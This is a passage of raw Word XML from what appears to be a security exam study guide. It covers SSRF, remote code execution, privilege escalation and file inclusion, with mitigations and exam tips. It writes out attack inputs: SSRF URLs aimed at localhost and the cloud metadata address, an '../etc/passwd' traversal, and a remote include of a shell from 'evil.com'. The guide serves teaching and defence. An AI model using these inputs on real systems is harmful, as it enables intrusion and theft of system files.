      </w:r>
    </w:p>
    <w:p w14:paraId="77EF67D5" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366F5E4D" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>13. Server-side request forgery (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698176A1" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B0E358" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Attacker tricks server into making HTTP requests </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>on its behalf</w:t>
      </w:r>
      <w:r>
        <w:t>, often to internal resources the attacker cannot reach directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0E6D2D" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237F38C2" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>App takes a URL from user, then server fetches content (for preview, import, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B1230C" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attacker submits URL like http://localhost/admin or http://169.254.169.254 (cloud metadata).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409A6285" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Impacts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC25603" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Access internal web services, metadata endpoints, scanning internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236ABF28" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513423FE" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Input validation: only allow URLs to trusted domains; deny internal/private IP ranges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5855A588" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enforce outbound network egress controls (restrict where servers can connect).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BC3F93" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DNS and firewall rules to block internal/metadata access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DFDD32" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use allowlists, not blocklists alone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F358521" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exam triggers (SSRF)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23412525" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“Application fetches a URL provided by user; attacker points to internal address,” “access to cloud metadata from web app.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153AD456" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Correct mitigation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>validate URLs, restrict internal addresses, egress filtering, WAF</w:t>
      </w:r>
      <w:r>
        <w:t>, not “TLS” or “password policy.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF09D32" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05CB3240" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>14. Remote code execution (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5385BC" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223E57E3" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Attacker can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>run arbitrary code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the system (remotely). This is often the ultimate outcome of other bugs (overflow, deserialization, injection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBE6A18" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF8F143" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit in web server allowing upload and execution of scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4C6950" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Unsafe deserialization leading to OS commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A70F0F7" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D8F179" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Apply security patches quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B47C36" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Input validation, safe deserialization, avoid dynamic eval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010DE183" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Least privilege on processes; OS hardening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C91136B" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>WAF rules to filter known exploit patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A2A586" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exam triggers (RCE)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB4C6C1" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“Attacker can execute arbitrary commands/code remotely,” “remote shell,” “web shell.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5839BDBB" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Answer with: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>patching, hardening, input validation, WAF, least privilege</w:t>
      </w:r>
      <w:r>
        <w:t>, not only “logging.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A308866" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72ED863F" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>15. Privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D440CE2" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AF0674" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Attacker uses a flaw to increase their permission level: from normal user to admin/root, or from one role to a more privileged one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13976D81" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3350ADC7" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vertical escalation: user → admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392782CF" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Horizontal escalation: user → another user’s privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD21F08" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD5BF6" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Misconfigured permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BDAEFB" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SUID/SGID binaries, vulnerable services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EE9904" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Access control or authentication flaws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27711362" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380163C7" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Least privilege everywhere (accounts, services, processes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285DA695" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Patch privilege escalation vulnerabilities promptly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCC5B13" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Regular permission and role reviews.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CEC38A" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use EDR to detect abnormal privilege use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C306497" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exam triggers (privilege escalation)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178FDE6F" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“User with standard rights can perform admin actions” or “exploit allows gaining root.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0554F942" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mitigation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>least privilege, patching, permission audits</w:t>
      </w:r>
      <w:r>
        <w:t>, not just “encrypt data.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EAFD8B" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D0D898B" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>16. Local file inclusion (LFI) / Remote file inclusion (RFI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B62A7B7" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C8C1AA" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Application includes a file whose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>path or name is based on user input</w:t>
      </w:r>
      <w:r>
        <w:t>. Attacker manipulates this to execute arbitrary code or read internal files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABA7AB6" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>a. Local File Inclusion (LFI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F027DCB" w14:textId="77777777" w:rsidR="00E0685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What</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Includes a file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>from the local file system</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA0C13E" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2241F7" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>page.php?file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C495D6C" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>file=../../upload/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>evil.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to execute uploaded shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0591D706" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F2AC0A" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Whitelist allowed files; never include arbitrary paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BED193" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Canonicalize and validate file paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417ADB5B" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Restrict execution permissions; store includes outside web root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A02AC5" w14:textId="77777777" w:rsidR="000F7397" w:rsidRDefault="000F7397">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="213DFB91" w14:textId="586429B0" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>b. Remote File Inclusion (RFI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E8A46B" w14:textId="77777777" w:rsidR="00E06859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What</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Includes a file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>from a remote server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> over HTTP/S.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F8864C" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D44DAE4" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>page.php?file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=http://evil.com/shell.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158E2908" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C8E755" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable remote URL includes in configuration (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allow_url_fopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> off).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5F7008" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Same controls as LFI: only allow pre-defined files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1759E00A" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exam triggers (LFI/RFI)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF4A04B" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Parameters like ?file=... or ?page=..., references to including files, or remote URLs being executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB65415" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mitigation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>path allowlists, disable remote includes, sanitize file parameters</w:t>
      </w:r>
      <w:r>
        <w:t>, not “use TLS.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C486C3" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D19148" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E0685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665E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF18F9F8"/>
    <w:lvl w:ilvl="0" w:tplc="36D013C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
